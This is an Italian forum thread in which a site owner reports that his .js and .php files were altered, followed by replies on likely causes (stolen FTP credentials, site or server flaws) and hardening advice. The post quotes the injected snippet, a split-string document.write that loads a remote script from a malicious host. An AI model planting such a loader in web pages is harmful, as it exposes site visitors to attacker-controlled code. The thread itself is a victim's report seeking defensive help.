Virus su siti web! Possibile?!?

[forgja84]

Buongiorno a tutti, questo caso è davvero misterioso, ma sono sicuro che ci sia una spiegazione logica, infatti volevo capire come sia potuto capitare che acuni file (file .js, .php)sui miei siti web, siano stati modificati introducendo questa porzione di codice direttamente sulle pagine!!!! di seguito il codice "Virus":

/*148a41*/
document.write('<script type="text/ja' + 'vascript" src="http://www.sitowebmaligno.com/1/ad.php?id=10" name="umtz10"></s' + 'cript>');
/*/148a41*/

In poche parole, "grazie" a questa porzione di codice i siti web presentavano problemi di visualizzazione (slide show, zoom su foto,ecc...) ...

Non capisco come questo virus sia potuto accedere ai siti web?!?!
A qualcuno di Voi è capitato?!?

Per evitare in futuro che si ripresenti, cosa bisogna fare..?!?!?

Ho dovuto sostituire tutti i file dei siti web, grazie ai backup...

So benissimo, che il mio FTP è protetto da psw, infatti lo subito sotituita con altra psw, il punto è che non comprendo come abbia fatto a conoscere le credenziali di accesso per ftp....

Comunque io possiedo un iMac con OSX versione 10.8.2

P.S.: Dobbiamo evitare che questo virus si propaghi

Grazie

Simone

[Habanero]

Sì succede... le cause possono essere varie... virus che rubano le credenziali di accesso al server FTP quando ci si connette... vulnerabilità presente sul sito che consente la modifica delle pagine... vulnerabilità del server...

[homerbit]

le cause principali, di solito, sono bugs di qualche script che permette l'inserimento di codice malevolo, oppure server vulnerabili.
Solitamente questi codici malevoli vengono scritti su file html e cmq su tutti quei files e cartelle che hanno i permessi di scrittura....quindi se non sono necessari al funzionamento del sito sempre meglio disabilitare i permessi. Poi tenere aggiornati gli eventuali "script di terzi"